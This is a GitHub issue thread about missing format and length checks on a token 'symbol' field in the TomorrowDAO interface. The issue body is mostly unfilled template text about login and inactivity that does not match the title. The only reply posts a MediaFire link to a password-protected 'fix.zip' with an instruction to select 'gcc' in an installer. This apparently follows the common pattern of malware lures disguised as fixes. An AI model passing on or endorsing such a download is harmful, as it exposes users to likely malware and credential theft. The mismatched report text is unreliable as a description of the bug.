### ISSUE TITLE
symbol does not verify format and length first

### ISSUE THREAD

**Issue by curlconverter-tian** [TomorrowDAOProject/tomorrowDAO-interface#456]
### Description
symbol does not verify format and length first.

### Steps To Reproduce
1. Log in...
2. Ensure that...
3. Allow a long period of inactivity to pass...
4. Observe that...
5. Attempt to log in...

### Current Behavior
![img_v3_02e6_e5780989-1a53-48b1-9d57-27c14c67b1hu](https://github.com/user-attachments/assets/e859553c-3a58-464a-9c15-767df939d73c)

### Expected Behavior
- After a long period of inactivity...
- When a user logs in successfully...
- This ensures that only...

### Environment
- Platform: PC
- Node: v18.18.0
- Browser: Chrome 126.0.6478.56

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
